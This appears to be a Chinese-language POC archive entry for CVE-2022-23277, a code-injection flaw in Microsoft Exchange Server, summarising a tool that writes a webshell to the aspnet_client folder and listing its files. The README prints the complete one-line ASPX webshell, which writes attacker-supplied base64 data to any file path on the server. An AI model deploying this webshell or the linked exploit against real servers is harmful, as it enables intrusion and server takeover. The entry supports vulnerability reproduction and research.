关联漏洞
标题:Microsoft Exchange Server 代码注入漏洞 (CVE-2022-23277)POC 描述:Microsoft Exchange Server是美国微软(Microsoft)公司的一套电子邮件服务程序。它提供邮件存取、储存、转发,语音邮件,邮件过滤筛选等功能。 Microsoft Exchange Server 存在代码注入漏洞。以下产品和版本受到影响:Microsoft Exchange Server 2013 Cumulative Update 23,Microsoft Exchange Server 2016 Cumulative Update 21,Microsoft Exchange
POC 描述
CVE-2022-23277 POC to write a webshell to aspnet_client
介绍
# exch_CVE-2021-42321
## 本文是7bits安全团队文章《DotNet安全-CVE-2022-23277漏洞复现》涉及到的工具
认证部分需要通过burpsuite手动添加,利用成功后会在aspnet_client写入1.aspx。
webshell:
```
<%@ Page Language="JScript" Debug="true"%><%@Import Namespace="System.IO"%><%File.WriteAllBytes(Request["b"], Convert.FromBase64String(Request["a"]));%>
```
利用详情可以参照我们的文章
### 欢迎关注我们的公众号 - Zbits2022

文件快照
[4.0K] /data/pocs/a4ff0f5a1104dda0de593d935399ceb0aaa95892
├── [9.7K] cve-2022-23277.py
├── [4.0K] images
│ └── [ 27K] qrcode.jpg
├── [ 34K] ObjectDataProviderGenerator.cs
└── [ 510] README.md
1 directory, 4 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。